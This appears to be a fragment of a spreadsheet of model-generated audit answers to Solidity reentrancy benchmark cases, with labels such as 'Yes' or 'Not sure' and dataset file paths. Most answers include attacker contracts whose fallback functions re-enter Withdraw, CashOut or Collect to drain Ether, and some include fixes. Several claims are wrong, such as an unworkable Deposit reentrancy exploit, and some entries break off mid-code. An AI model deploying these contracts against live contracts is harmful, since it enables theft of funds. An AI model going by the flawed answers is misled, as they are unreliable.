The contract `PrivateBank` contains a critical reentrancy vulnerability in the `Withdraw` function (which is not shown in the snippet but is assumed to be in the rest of the code). Typically, this function would allow a user to withdraw their Ether balance from the contract. Here's a simplified example of what the `Withdraw` function might look like based on the provided snippet:
```solidity
function Withdraw(uint amount)
public
{
    if(balances[msg.sender] &gt;= amount)
    {
        msg.sender.call.value(amount)();
        balances[msg.sender] -= amount;
        TransferLog.AddMessage(msg.sender, amount, "Withdraw");
    }
}
```
The reentrancy vulnerability exists because the contract sends Ether with `msg.sender.call.value(amount)()` before updating the user's balance (`balances[msg.sender] -= amount;`). This allows the user to re-enter the `Withdraw` function before their balance is updated, potentially draining more Ether from the contract than they should be able to.
### How the Attack Could Be Carried Out:
1. The attacker deploys a contract that has a fallback function designed to call the `Withdraw` function on the `PrivateBank` contract.
2. The attacker deposits some Ether into the `PrivateBank` contract.
3. The attacker calls their own contract's function that triggers the fallback, initiating the reentrancy attack.
4. The fallback function in the attacker's contract calls `Withdraw` again before `PrivateBank` has a chance to update the user's balance.
5. This process can repeat multiple times in a single transaction, draining the `PrivateBank` contract of more Ether than the attacker initially deposited.
Here's a simplified example of what the attacker's contract might look like:
```solidity
contract Attacker {
    PrivateBank privateBank;
    constructor(address _privateBankAddress) {
        privateBank = PrivateBank(_privateBankAddress);
    }
    function attack() public payable {
        privateBank.Deposit.value(msg.value)();
        privateBank.Withdraw(msg.value);
    }
    function () public payable {
        if (address(privateBank).balance &gt;= msg.value) {
            privateBank.Withdraw(msg.value);
        }
    }
}
```
### Remediation:
To fix this vulnerability, it's crucial to update the user's balance before sending the Ether. The use of `reentrancy guard` modifiers or patterns like `Checks-Effects-Interactions` can also mitigate this risk.</t>
  </si>
  <si>
    <t>1. Yes
2. Proof of Concept of these vulnerabilities:
The given code snippet is a Solidity function that allows a user to cash out from their balance. The code is vulnerable to a reentrancy attack because it calls an external contract (`msg.sender.call.value(_am)()`) before updating the internal state (`balances[msg.sender]-=_am;`).
Here's how an attacker can exploit this:
1. The attacker deploys a malicious contract that overrides the fallback function.
2. The malicious contract calls the `CashOut` function.
3. During the external call (`msg.sender.call.value(_am)()`), the control is transferred to the attacker's contract.
4. The fallback function in the attacker's contract calls `CashOut` again.
5. Because the balance is not yet updated, the attacker can withdraw more than their balance.
Here's an example of a malicious contract:
```solidity
// Malicious contract exploiting reentrancy
contract MaliciousContract {
    VulnerableContract public vulnerableContract;
    constructor(address _vulnerableContractAddress) {
        vulnerableContract = VulnerableContract(_vulnerableContractAddress);
    }
    // Fallback function to call CashOut again
    fallback() external payable {
        if (address(vulnerableContract).balance &gt;= msg.value) {
            vulnerableContract.CashOut(msg.value);
        }
    }
    // Initial function to start the attack
    function initiateAttack(uint _am) public {
        vulnerableContract.CashOut(_am);
    }
}
```
In this scenario, the attacker can repeatedly call `CashOut` to drain the contract's funds before the internal balance gets updated.</t>
  </si>
  <si>
    <t>dataset/reentrancy/0xbaf51e761510c1a11bf48dd87c0307ac8a8c8a4f.sol</t>
  </si>
  <si>
    <t>1. Are there any vulnerabilities? 
Yes
2. how this vulnerability can be exploited :
### Vulnerabilities
1. **Outdated Solidity Version**: The contract uses an outdated version of Solidity (`0.4.19`). This is risky as newer versions often come with security improvements and bug fixes.
2. **No Withdraw Function**: The contract provides a deposit function but does not appear to have a way to withdraw the deposited Ether, making it a potential honeypot.
3. **No Ownership or Access Control**: The contract lacks any kind of ownership or access control logic. This means that potentially anyone could interact with certain parts of the contract that should be restricted.
4. **No Events**: The contract does not emit events for important state changes, making it difficult to audit and track its behavior.
5. **Uninitialized Log Contract**: The `Log` contract is not shown, and its `AddMessage` method is called in the `Deposit` function without any checks on whether `Log` is a valid contract. This could lead to unexpected behavior.
6. **No Input Validation**: Although there is a minimum deposit check, there are no other validations like maximum deposit limit or similar.
7. **Integer Overflow**: The contract does not protect against integer overflow in the line `balances[msg.sender]+=msg.value;`.
8. **Fallback Function**: The contract does not have a fallback function, which could result in unexpected behavior when receiving Ether.
### Proof of Concept
1. **Outdated Solidity Version**: Simply using an older compiler exposes the contract to all the vulnerabilities that have been fixed in later versions.
2. **No Withdraw Function**: Any Ether sent to this contract is effectively stuck.
3. **No Ownership or Access Control**: Any account could potentially set the `Log` address, for example, if that function were available.
4. **No Events**: Hard to audit or track without on-chain events.
5. **Uninitialized Log Contract**: If the `Log` contract contains bugs or is malicious, it could affect the behavior of this contract.
6. **No Input Validation**: An attacker can deposit any amount greater than `MinDeposit` without any restrictions.
7. **Integer Overflow**: By sending a very high amount of Ether, an attacker could overflow the `balances` mapping, setting it back to a low value.
8. **Fallback Function**: Sending Ether to the contract without enough gas could lead to unexpected behavior.
Due to these vulnerabilities, it is advised not to use this contract in its current form.</t>
  </si>
  <si>
    <t>1. Yes
2. Proof of Concept of Vulnerabilities:
### Re-Entrancy Vulnerability
The code is vulnerable to a re-entrancy attack. The issue arises from the line:
```solidity
if(msg.sender.call.value(_am)())
```
The function `msg.sender.call.value(_am)()` sends `_am` amount of Ether to the `msg.sender`. However, this line of code is executed before the `balances[msg.sender] -= _am;` line, which updates the balance of the sender. If the sender is a malicious smart contract, it can recursively call the `CashOut` function before `balances[msg.sender]` is updated. This could allow the attacker to drain more funds than they should be able to.
#### How the Attack Could Work
1. The attacker deploys a malicious smart contract that has a fallback function designed to call back into the `CashOut` function of the vulnerable contract.
2. The attacker calls `CashOut` once from their malicious contract.
3. The `msg.sender.call.value(_am)()` line is reached, which triggers the fallback function in the malicious contract.
4. The fallback function calls `CashOut` again before `balances[msg.sender]` is updated.
5. This can be repeated multiple times, draining more Ether than the attacker initially had in `balances[msg.sender]`.
Here is a simplified example of a malicious contract that could exploit this vulnerability:
```solidity
contract MaliciousContract {
    VulnerableContract public victim;
    constructor(address _victim) {
        victim = VulnerableContract(_victim);
    }
    function attack() public payable {
        victim.CashOut(1 ether);
    }
    // Fallback function
    fallback() external payable {
        if (address(victim).balance &gt;= 1 ether) {
            victim.CashOut(1 ether);
        }
    }
}
```
To mitigate this vulnerability, you could update the `balances[msg.sender]` before making the external call. This pattern is known as "Checks-Effects-Interactions."
Here's a safer version of the code:
```solidity
function CashOut(uint _am)
public
payable
{
    if(_am &lt;= balances[msg.sender])
    {
        balances[msg.sender] -= _am;  // Move this line up
        if(msg.sender.call.value(_am)())
        {
            TransferLog.AddMessage(msg.sender, _am, "CashOut");
        }
        else {
            balances[msg.sender] += _am;  // Revert the balance if the transfer fails
        }
    }
}
```</t>
  </si>
  <si>
    <t>1. Are there any reentrancy vulnerabilities? 
Not sure.
2. how this vulnerability can be exploited :
The smart contract contains a function `Deposit` that allows users to deposit Ether into the contract. The function also updates the balances mapping to reflect the deposited amount. Additionally, it calls an external contract `TransferLog` using `TransferLog.AddMessage(msg.sender,msg.value,"Deposit");`.
The issue here is that the contract updates its state (`balances[msg.sender]+=msg.value;`) before calling an external contract (`TransferLog.AddMessage`). This opens up a reentrancy vulnerability, where an attacker can exploit the external call to re-enter the `Deposit` function, leading to unexpected behavior.
An attacker can create a malicious contract that overrides the fallback function to call the `Deposit` function of the vulnerable contract when `TransferLog.AddMessage` is invoked. Since the balance update has already taken place before the external call, repeated reentry could allow the attacker to drain Ether from the contract.
Here's a simplified example of how an attacker might exploit this vulnerability:
```solidity
// Attacker's malicious contract
contract Attacker {
    ETH_VAULT public victim;
    constructor(address _victim) public {
        victim = ETH_VAULT(_victim);
    }
    function attack() public payable {
        victim.Deposit.value(msg.value)();
    }
    function() external payable {
        if (address(victim).balance &gt;= msg.value) {
            victim.Deposit.value(msg.value)();
        }
    }
}
```
In this example, the attacker's contract deposits Ether into the `ETH_VAULT` contract using the `Deposit` function. When `TransferLog.AddMessage` is called, it triggers the fallback function in the attacker's contract, which calls `Deposit` again. This loop continues as long as the `ETH_VAULT` contract has enough Ether, potentially draining it.</t>
  </si>
  <si>
    <t>1. Yes
2. Proof of Concept of these vulnerabilities:
The code contains a reentrancy vulnerability because it performs a state-changing operation (`balances[msg.sender]-=_am;`) after it transfers funds (`msg.sender.call.value(_am)()`).
A malicious contract can exploit this vulnerability by calling `CashOut` in its fallback function. Here's a simple proof-of-concept of a malicious contract that could exploit the reentrancy vulnerability:
```solidity
pragma solidity ^0.8.0;
interface TargetContract {
    function CashOut(uint _am) external payable;
}
contract MaliciousContract {
    TargetContract target;
    uint public amountToSteal;
    constructor(address _target, uint _amountToSteal) {
        target = TargetContract(_target);
        amountToSteal = _amountToSteal;
    }
    fallback() external payable {
        if (address(target).balance &gt;= amountToSteal) {
            target.CashOut(amountToSteal);
        }
    }
    function attack() external payable {
        require(msg.value == amountToSteal, "Send the exact amount to steal");
        target.CashOut(amountToSteal);
    }
}
```
In this example, the `MaliciousContract` specifies the target contract to attack and the amount it wants to steal. When `attack()` is called, it triggers `CashOut` in the target contract, which in turn triggers the fallback function of `MaliciousContract`. The fallback function calls `CashOut` again, creating a loop that will continue to drain the target contract until it has no more funds or the `amountToSteal` is reached.</t>
  </si>
  <si>
    <t>dataset/reentrancy/0xbe4041d55db380c5ae9d4a9b9703f1ed4e7e3888.sol</t>
  </si>
  <si>
    <t>1. Are there any vulnerabilities? 
Yes.
2. how this vulnerability can be exploited :
### Vulnerabilities Identified:
#### 1. Usage of Deprecated Language Features
- The contract is using a very old version of Solidity (`^0.4.19`). This exposes it to various known vulnerabilities fixed in later versions.
#### 2. Use of `throw`
- The `throw` statement is deprecated and should not be used. It consumes all the remaining gas, which is not efficient. Use `require`, `assert`, or `revert` instead.
#### 3. Lack of Access Control
- Functions like `SetMinSum` and `SetLogFile` can be called by anyone. They should be restricted to only the contract owner or specific roles.
#### 4. Missing Initialization Flag
- The `intitalized` flag is declared but never set to `true`, meaning it will always be `false`. This can cause unintended behavior.
#### 5. Incomplete Code
- The code is truncated, so it's not clear what `Log` and `LogFile` are supposed to do. This makes the code susceptible to unknown vulnerabilities.
#### 6. No SafeMath Library
- Arithmetic operations are not safeguarded against integer overflow or underflow.
#### 7. Unspecified Visibility
- The contract's state variables do not explicitly state their visibility (`public`, `private`, etc.), which can lead to unintended access.
#### 8. Lack of Events
- There are no events to log important state changes, making it hard to monitor and debug the contract.
#### 9. Unused Struct and Mapping
- The `Holder` struct and `Acc` mapping are declared but not used in the displayed code, making it unclear what their purpose is.
#### 10. Spelling and Typographical Errors
- There are typographical errors like `intitalized` instead of `initialized`, which can create confusion.
#### Proof of Concept:
- For the lack of access control, anyone can call `SetMinSum` or `SetLogFile`, potentially changing important contract parameters.
  ```solidity
  // An attacker can set the minimum sum to an arbitrary value
  contract.attackSetMinSum(1000000 ether);
  // An attacker can set the LogFile to a malicious contract
  contract.attackSetLogFile(attacker_controlled_address);
  ```
- For the deprecated `throw`, an attacker can intentionally trigger this to consume all the remaining gas.
  ```solidity
  //</t>
  </si>
  <si>
    <t>### 1. Are there any vulnerabilities?
Yes
### 2. how this vulnerability can be exploited :
1. **Reentrancy Attack**: The code is susceptible to a reentrancy attack because it calls an external contract (`msg.sender.call.value(_am)()`) before updating the state (`acc.balance-=_am;`). An attacker can recursively call the `Collect` function to drain the contract's Ether.
2. **Use of `var`**: The code uses `var` for the variable `acc`, which is deprecated in newer versions of Solidity. This is not exactly a security vulnerability but a bad practice.
3. **Use of `now`**: The use of `now` for timing conditions can be manipulated by miners to some extent, although the impact may be minimal.
4. **Lack of Event Logging**: While not a direct vulnerability, the absence of Solidity `emit` events makes it difficult to track actions on the blockchain.
5. **No Function Visibility for `LogFile.AddMessage`**: It's unclear what `LogFile.AddMessage` does and whether it could introduce vulnerabilities. Without knowing the implementation, we can't be sure if it's secure or not.
6. **No Checks-Effects-Interactions Pattern**: The function does not follow the Checks-Effects-Interactions pattern, which is a best practice in Solidity to prevent reentrancy and other issues.
7. **No Revert for Failed Conditions**: If the conditions for transferring Ether are not met, the function silently fails without reverting the transaction or providing any feedback.
8. **Uninitialized Storage Pointer**: The code snippet uses `Acc[msg.sender]` without showing how `Acc` is defined or initialized, which could potentially lead to issues.
9. **Lack of Input Validation**: The function doesn't validate the input `_am`, which could potentially cause issues.
10. **No Fallback**: The contract lacks a fallback function to handle unexpected Ether transfers.
11. **Obsolete `call.value` Syntax**: The use of `call.value()` is considered risky and should be replaced with the safer `transfer()` or `send()` methods.
#### Reentrancy Attack POC:
A malicious contract could look something like this:
```solidity
contract Malicious {
    VulnerableContract target;
    constructor(address _target) {
        target = VulnerableContract(_target);
    }
    function attack() public payable {
        // Assume that this contract has enough balance in the target contract
        target.Collect(msg.value);
    }
    // Fallback function
    function () public payable {
        if (address(target).balance &gt;= msg.value) {
            target.Collect(msg.value);
        }
    }
}
```
This contract would continuously call `Collect` whenever `msg.sender.call.value(_am)()` is triggered, leading to a reentrancy attack.</t>
  </si>
  <si>
    <t>1. Are there any reentrancy vulnerabilities?
   Yes
2. how this vulnerability can be exploited :
   The `Collect` function in the contract is vulnerable to a reentrancy attack. Here's the relevant code snippet:
   ```solidity
   function Collect(uint _am)
   public
   payable
   {
       var acc = Acc[msg.sender];
       if( acc.balance&gt;=MinSum &amp;&amp; acc.balance&gt;=_am &amp;&amp; now&gt;acc.unlockTime)
       {
           if(msg.sender.call.value(_am)())
           {
               acc.balance-=_am;
               LogFile.AddMessage(msg.sender,_am,"Collect");
           }
       }
   }
   ```
   In this function, the contract sends Ether back to the sender's address using `msg.sender.call.value(_am)()` before updating the sender's balance `acc.balance-=_am;`. An attacker can exploit this by making a recursive call back into the `Collect` function before the balance is updated. This would allow the attacker to withdraw more funds than they should be able to.
   To fix this vulnerability, the contract should first update the state variable (`acc.balance`) before transferring any funds. This is known as the Checks-Effects-Interactions pattern. Here's how the function can be updated to mitigate the reentrancy vulnerability:
   ```solidity
   function Collect(uint _am)
   public
   payable
   {
       var acc = Acc[msg.sender];
       if( acc.balance &gt;= MinSum &amp;&amp; acc.balance &gt;= _am &amp;&amp; now &gt; acc.unlockTime)
       {
           acc.balance -= _am;  // Update the state variable first
           if(msg.sender.call.value(_am)())
           {
               LogFile.AddMessage(msg.sender, _am, "Collect");
           }
           else
           {
               acc.balance += _am;  // Revert the balance if the transfer fails
           }
       }
   }
   ```</t>
  </si>
  <si>
    <t>1. Yes
2. Proof of Concept of these vulnerabilities:
The code is vulnerable to a reentrancy attack because it makes an external call (`msg.sender.call.value(_am)()`) before updating the state (`acc.balance-=_am;`). In this vulnerable sequence, an attacker could call back into the `Collect` function before `acc.balance` is updated, effectively draining the contract's funds.
Here's a simplified example to illustrate the attack:
```solidity
// Attacker's contract
contract Attacker {
    Target target;
    constructor(address _target) {
        target = Target(_target);
    }
    function attack() public payable {
        // Trigger the vulnerable function
        target.Collect(1 ether);
    }
    // Fallback function
    function() external payable {
        if (address(target).balance &gt;= 1 ether) {
            target.Collect(1 ether);
        }
    }
}
```
In this example, the `Attacker` contract triggers the vulnerable `Collect` function of the `Target` contract. The `Collect` function then calls back into the fallback function of the `Attacker`, which again calls `Collect`. This can be repeated as long as the `Target` contract has enough balance, effectively draining it.</t>
  </si>
  <si>
    <t>dataset/reentrancy/0xcead721ef5b11f1a7b530171aab69b16c5e66b6e.sol</t>
  </si>
  <si>
    <t>1. Are there any vulnerabilities? 
Yes.
2. how this vulnerability can be exploited :
### Vulnerabilities and Proof of Concept
1. **Deprecated Solidity Version**: The smart contract is written in an old version of Solidity (`^0.4.25`). Newer versions have better optimizations and security features.
2. **Use of `var` Keyword**: The use of the `var` keyword for type inference is deprecated. This could lead to unintended behavior.
3. **Re-entrancy Vulnerability**: From the snippet, the function `Collect` seems to be sending Ether with `msg.sender.transfer()` or `msg.sender.send()`, but it is not clear if state changes occur before this, making it potentially vulnerable to re-entrancy attacks.
4. **Unchecked Math Operations**: The contract performs arithmetic operations like `acc.balance += msg.value;` without using SafeMath or checking for overflows/underflows.
5. **Uninitialized Storage Pointers**: The use of `var acc = Acc[msg.sender];` creates a storage pointer. If `Acc` is a storage mapping, then failing to initialize `acc` can lead to unexpected behavior.
6. **No Visibility Specifiers**: Functions like `Put` and `Collect` don't have visibility specified, which defaults to `public`, but it might not be the intended behavior.
7. **Timestamp Dependence**: The contract uses `now` for time locking, which can be manipulated by miners to a certain extent.
8. **Lack of Events**: The contract seems to use a custom logging mechanism (`LogFile.AddMessage`), which is less efficient and transparent compared to using Solidity's event logging.
9. **No Fallback Function**: The contract lacks a fallback function, meaning it can't receive Ether directly without calling a function.
Please note that the code snippet is incomplete, and a full review would require the entire smart contract code.</t>
  </si>
  <si>
    <t>1. Yes, there are vulnerabilities.
2. how this vulnerability can be exploited :
### Vulnerabilities:
#### 1. Reentrancy Attack
The function is vulnerable to a reentrancy attack because it calls an external contract (`msg.sender.call.value(_am)()`) before it updates the state (`acc.balance-=_am;`). An attacker can recursively call the `Collect` function before the state is updated, draining more funds than they should be able to.
#### 2. Use of `var`
The use of `var` is deprecated in newer versions of Solidity. It is better to explicitly state the variable type for clarity and to prevent potential errors.
#### 3. Use of `now`
The use of `now` for time-sensitive logic can be manipulated by miners to some extent. Although not a critical vulnerability in most cases, it's something to be cautious about.
#### 4. Lack of Event Emission
While not a security vulnerability per se, the lack of events makes it difficult to track transactions on-chain. It's a best practice to emit events for important state changes.
#### 5. No Checks for Function Call Success
The function doesn't check whether `LogFile.AddMessage` succeeds or fails, which could lead to unrecorded transactions or other unexpected behavior. While this isn't necessarily a security issue in this context (without knowing what `LogFile.AddMessage` does), it's generally good practice to check the success of function calls.
#### 6. Lack of Access Control
The function is marked as `public` but does not have any access control mechanisms (like `onlyOwner` or similar modifiers). Depending on the use-case, this could be a vulnerability.
### Proof of Concept for Reentrancy:
For the reentrancy attack, an attacker could create a malicious contract that overrides the fallback function to call `Collect` recursively.
Here's a simplified example:
```solidity
contract Attacker {
    TargetContract target;
    constructor(address _targetAddress) public {
        target = TargetContract(_targetAddress);
    }
    // Fallback function that gets called when receiving Ether
    fallback() external payable {
        if (address(target).balance &gt;= 1 ether) {
            target.Collect(1 ether);
        }
    }
    // Initial function to start the attack
    function startAttack() public {
        target.Collect(1 ether);
    }
}
```
In this example, calling `startAttack` would trigger the fallback function, which calls `Collect` recursively, allowing the attacker to drain more funds than they should be able to.
Note: This is a simplified example for demonstration purposes. Actual implementation details may vary.</t>
  </si>
  <si>
    <t xml:space="preserve">1. Are there any vulnerabilities? 
Yes
2. how this vulnerability can be exploited :
- **Reentrancy Attack**: The function allows for the reentrancy vulnerability because it makes an external call to `msg.sender` before updating the state variable `acc.balance`. An attacker could recursively call the `Collect` function before `acc.balance` is updated, allowing them to drain more funds than they should be able to.
- **Use of 'var' Keyword**: The use of the `var` keyword for type inference is deprecated and could lead to unexpected behavior. It's better to specify the variable type explicitly.
- **Using 'now' for Business Logic**: The use of `now` (alias for `block.timestamp`) can be manipulated by miners to some extent, although the impact is generally limited.
- **Lack of Event Logging**: There's no Solidity event to log important state changes, making it harder to monitor and debug the contract.
Here is a sample attack contract to demonstrate the reentrancy attack:
```solidity
pragma solidity ^0.8.0;
interface VulnerableContract {
    function Collect(uint _am) external payable;
}
contract ReentrancyAttack {
    VulnerableContract public victim;
    uint public amountToSteal;
    constructor(address _victim, uint _amountToSteal) {
        victim = VulnerableContract(_victim);
        amountToSteal = _amountToSteal;
    }
    // Fallback function to perform reentrancy attack
    fallback() external payable {
        if (address(victim).balance &gt;= amountToSteal) {
            victim.Collect(amountToSteal);
        }
    }
    // Initial function to start the attack
    function startAttack() external {
        victim.Collect(amountToSteal);
    }
}
```
To mitigate these issues:
- Use the Checks-Effects-Interactions pattern to update state variables before making external calls.
- Replace the `var` keyword with the explicit type.
- Consider using block numbers instead of `now` for time-based conditions.
- Use Solidity events for logging important state changes.
</t>
  </si>
  <si>
    <t>1. Yes
2. Proof of Concept of these vulnerabilities:
The code snippet appears to be a part of a Solidity smart contract and contains a reentrancy vulnerability in the `Collect` function. The issue lies in the sequence of operations:
1. The contract sends Ether to the caller using `msg.sender.call.value(_am)()`.
2. It then updates the internal balance `acc.balance-=_am;`.
In Solidity, the `.call.value()` function allows the receiver (in this case, `msg.sender`) to execute arbitrary code as part of the call. This means that the receiver could call the `Collect` function again before `acc.balance` is updated, allowing multiple withdrawals in a single transaction — essentially draining more funds than intended. This is a classic example of a reentrancy vulnerability.
Here's a simple example to demonstrate the vulnerability:
```solidity
// Attacker contract
contract Attacker {
    Target target; // Assume Target is the vulnerable contract
    uint public count = 0;
    constructor(address _target) public {
        target = Target(_target);
    }
    // Fallback function to receive Ether
    fallback() external payable {
        if (count &lt; 10) {  // To avoid infinite loop, set a limit for reentrancy
            count++;
            target.Collect(1 ether);  // Recursive call
        }
    }
    // Initial function to trigger the attack
    function attack() public {
        target.Collect(1 ether);
    }
}
```
In the above code, `Target` is the vulnerable contract, and `Attacker` is the malicious contract trying to exploit the vulnerability. When `attack()` is called, it will trigger the `Collect` function in the `Target` contract, which will then send Ether to the `Attacker` contract's fallback function. The fallback function will recursively call `Collect` again, allowing for multiple withdrawals. 
To fix this issue, always update internal states before sending out funds to external contracts:
```solidity
function Collect(uint _am) public payable {
    var acc = Acc[msg.sender];
    if( acc.balance &gt;= MinSum &amp;&amp; acc.balance &gt;= _am &amp;&amp; now &gt; acc.unlockTime) {
        acc.balance -= _am;
        if(msg.sender.call.value(_am)()) {
            LogFile.AddMessage(msg.sender, _am, "Collect");
        } else {
            // Revert the balance if the transfer fails
            acc.balance += _am;
        }
    }
}
```</t>
  </si>
  <si>
    <t>dataset/reentrancy/0xf015c35649c82f5467c9c74b7f28ee67665aad68.sol</t>
  </si>
  <si>
    <t>1. Are there any vulnerabilities? Yes
2. how this vulnerability can be exploited :
  - **Use of Deprecated `var` Keyword**: The code uses the deprecated `var` keyword for declaring variables. This can lead to unexpected behavior because `var` automatically infers the variable type. It's considered good practice to explicitly state variable types.
  - **Re-entrancy Vulnerability**: The function `Collect` seems to be vulnerable to re-entrancy attacks. While I can't see the full function, the fact that it appears to transfer funds (`msg.sender.transfer(...)`) without first setting the `acc.balance` to zero is concerning. In a re-entrancy attack, the attacker can recursively call the `Collect` function before `acc.balance` is updated, draining more funds than intended.
  - **Uninitialized Storage Pointers**: The use of `var acc = Acc[msg.sender];` suggests that `acc` could be an uninitialized storage pointer, which can lead to unexpected behavior or vulnerabilities.
  - **Lack of Event Logging**: The contract uses custom logging (`LogFile.AddMessage`) but it's better to use Solidity's built-in `event` for transparency and easier debugging.
  - **No Visibility Specifiers for Functions**: Functions like `Put` and `Collect` do not have visibility specifiers (`public`, `internal`, `private`, `external`). This can lead to vulnerabilities if not handled carefully.
  - **Outdated Solidity Version**: The code uses an outdated version of Solidity (`^0.4.25`). This version lacks several security features and improvements present in later versions.
Please note that the analysis is based on a partial view of the code and there might be additional vulnerabilities not visible in the snippet.</t>
  </si>
  <si>
    <t>"1. Are there any vulnerabilities? 
Yes
2. how this vulnerability can be exploited :
- **Use of var**: The use of `var` is deprecated in Solidity and can lead to type inference issues. This is not necessarily a security vulnerability, but it's a bad practice.
- **Reentrancy**: The function is vulnerable to reentrancy attacks because it interacts with an external contract (`msg.sender.call.value(_am)()`) before updating the state (`acc.balance-=_am;`). An attacker can recursively call the `Collect` function to drain the contract of its Ether.
- **Unchecked Underflow**: The line `acc.balance-=_am;` is susceptible to underflow if `_am` is greater than `acc.balance`. Although this is guarded by the condition `acc.balance &gt;= _am`, the reentrancy vulnerability can bypass this condition.
- **Use of `now`**: `now` is an alias for `block.timestamp`, and it can be manipulated by miners to some extent. This is not a high risk but should be noted.
Here's how a reentrancy attack could work:
1. The attacker sends a transaction to call the `Collect` function.
2. The contract checks whether `acc.balance &gt;= MinSum` and `acc.balance &gt;= _am` and `now &gt; acc.unlockTime` are true, and proceeds.
3. The contract sends Ether to `msg.sender` using `msg.sender.call.value(_am)()`.
4. The attacker's fallback function is triggered, which in turn calls `Collect` again.
5. The contract repeats steps 2-3, allowing the attacker to drain more Ether than they should be able to.
A fix would involve using the Checks-Effects-Interactions pattern, which recommends performing all external calls at the end of the function, after updating any state variables."</t>
  </si>
  <si>
    <t>1. Not sure.
2. Proof of Concept of these vulnerabilities:
The smart contract `MY_BANK` contains a reentrancy vulnerability in the `Collect` function. Specifically, the contract allows users to withdraw a specified amount of funds (`_am`) from their account, but it does not update the user's balance (`acc.balance`) before transferring the funds (`msg.sender.call.value(_am)`). This opens the door for a reentrant call, where an attacker could continuously drain the contract's funds.
Here's a snippet of the vulnerable code (from the `Collect` function):
```solidity
if( acc.balance&gt;=MinSum &amp;&amp; acc.balance&gt;=_am &amp;&amp; now&gt;acc.unlockTime)
{
    if(msg.sender.call.value(_am)())
    {
        acc.balance-=_am;
        LogFile.AddMessage(msg.sender,_am,"Collect");
    }
}
```
The correct way to mitigate this vulnerability is to update the account balance before making the external call, as shown below:
```solidity
if( acc.balance&gt;=MinSum &amp;&amp; acc.balance&gt;=_am &amp;&amp; now&gt;acc.unlockTime)
{
    acc.balance -= _am; // Update balance first
    if(msg.sender.call.value(_am)())
    {
        LogFile.AddMessage(msg.sender,_am,"Collect");
    }
    else
    {
        acc.balance += _am; // Revert the balance if the call fails
    }
}
```
By updating the balance before making the external call, the contract prevents a reentrant attacker from draining more funds than they should be able to.</t>
  </si>
  <si>
    <t>1. Yes
2. how this vulnerability can be exploited :
The code is vulnerable to reentrancy attacks due to the following reasons:
- The `msg.sender.call.value(_am)()` line sends ether back to the caller before updating the balance in the `acc.balance-=_am;` line. 
- There are no mutexes or locks to prevent the function from being called recursively.
A malicious attacker can exploit this by creating a fallback function that calls `Collect` again. This will allow the attacker to drain more funds than they should be able to, due to the balance not being updated before the ether is sent.
Here is a simplified example of how an attacker contract might look:
```solidity
contract Attacker {
    Victim victim;
    constructor(address _victim) {
        victim = Victim(_victim);
    }
    function attack() public payable {
        victim.Collect(msg.value);
    }
    // Fallback function
    function () external payable {
        if (address(victim).balance &gt;= msg.value) {
            victim.Collect(msg.value);
        }
    }
}
```
In this example, once the `attack()` function is called, it will trigger the `Collect` function in the victim contract. When `msg.sender.call.value(_am)()` is executed, it will call the fallback function in the attacker contract, which will then call `Collect` again, and so on. This will allow the attacker to drain more ether from the victim contract than they should be able to.</t>
  </si>
  <si>
    <t>dataset/reentrancy/etherbank.sol</t>
  </si>
  <si>
    <t xml:space="preserve">        function withdrawBalance() {  
                uint amountToWithdraw = userBalances[msg.sender];
                if (!(msg.sender.call.value(amountToWithdraw)())) { throw; }
                userBalances[msg.sender] = 0;
        }  </t>
  </si>
  <si>
    <t>1. Are there any vulnerabilities? 
   - Yes
2. how this vulnerability can be exploited :
   - **Reentrancy Vulnerability**: The `withdrawBalance` function is vulnerable to reentrancy attacks. When calling `msg.sender.call.value(amountToWithdraw)()`, external code is executed, allowing the attacker to re-enter the function before the state `userBalances[msg.sender] = 0;` is updated.
   - **Deprecated Syntax**: The contract uses the old `throw` keyword to revert transactions, which is now deprecated. Modern Solidity recommends using `require`, `assert`, or `revert` for better readability and gas efficiency.
   - **Versioning**: The Solidity version is set as ^0.4.0 which is considered old and may lack important security fixes and features.
   - **Visibility**: Functions `addToBalance` and `withdrawBalance` do not specify visibility (`public`/`private`/`internal`), thus defaulting to `public` which may or may not be intended.
   - **No Events**: The contract doesn't emit any events, which makes tracking transactions and state changes more difficult.
A reentrancy attack could potentially drain all the funds from the contract. The attacker creates a fallback function in their contract that calls `withdrawBalance` again, causing an infinite loop until all funds are withdrawn.</t>
  </si>
  <si>
    <t xml:space="preserve">1. Yes
2. how this vulnerability can be exploited :
The code is written in Solidity and is intended to be a part of a smart contract on the Ethereum blockchain. It has a critical vulnerability known as "Reentrancy."
### Vulnerability Details
The function `withdrawBalance()` is vulnerable to a reentrancy attack. The issue lies in the ordering of operations:
1. The contract calculates the `amountToWithdraw` based on the `userBalances` mapping.
2. It then sends this amount to the `msg.sender` address using `call.value(amountToWithdraw)()`.
3. Finally, it sets the `userBalances[msg.sender]` to zero.
The problem is that the external call `msg.sender.call.value(amountToWithdraw)()` can execute arbitrary code (if `msg.sender` is a contract). That code could call `withdrawBalance()` again before the original call has a chance to set `userBalances[msg.sender] = 0`. This can result in the attacker withdrawing more Ether than they should be able to.
### Proof of Concept
Below is a malicious contract that exploits the reentrancy vulnerability:
```solidity
pragma solidity ^0.4.24;
contract VulnerableContract {
    mapping(address =&gt; uint) public userBalances;
    function withdrawBalance() public {  
        uint amountToWithdraw = userBalances[msg.sender];
        if (!(msg.sender.call.value(amountToWithdraw)())) { throw; }
        userBalances[msg.sender] = 0;
    }
    // For demonstration purposes, a function to deposit ether into the contract
    function deposit() public payable {
        userBalances[msg.sender] += msg.value;
    }
}
contract Attacker {
    VulnerableContract public vulnerableContract;
</t>
  </si>
  <si>
    <t>1. Yes
2. how this vulnerability can be exploited :
The `withdrawBalance` function in the given Solidity contract is vulnerable to reentrancy attacks. The function performs an external call to `msg.sender` before updating the state variable `userBalances[msg.sender]`.
Here's the relevant code for better understanding:
```solidity
function withdrawBalance() {  
    uint amountToWithdraw = userBalances[msg.sender];
    if (!(msg.sender.call.value(amountToWithdraw)())) { throw; }
    userBalances[msg.sender] = 0;
}
```
An attacker can exploit this by initiating a fallback function in their own contract that calls `withdrawBalance` again before `userBalances[msg.sender]` is set to 0. This would allow them to drain more ether than they are supposed to.
Here's a simple attacker contract to demonstrate the vulnerability:
```solidity
pragma solidity ^0.4.0;
import "EtherBank.sol";  // Assuming the original contract is imported
contract Attacker {
    EtherBank public etherBank;
    address owner;
    constructor(address _etherBankAddress) {
        etherBank = EtherBank(_etherBankAddress);
        owner = msg.sender;
    }
    // Fallback function that will be called when the contract receives Ether
    function () payable {
        if (address(etherBank).balance &gt;= msg.value) {
            etherBank.withdrawBalance();
        }
    }
    // Initial function to kick off the attack
    function attack() public payable {
        require(msg.sender == owner);
        etherBank.addToBalance.value(msg.value)();
        etherBank.withdrawBalance();
    }
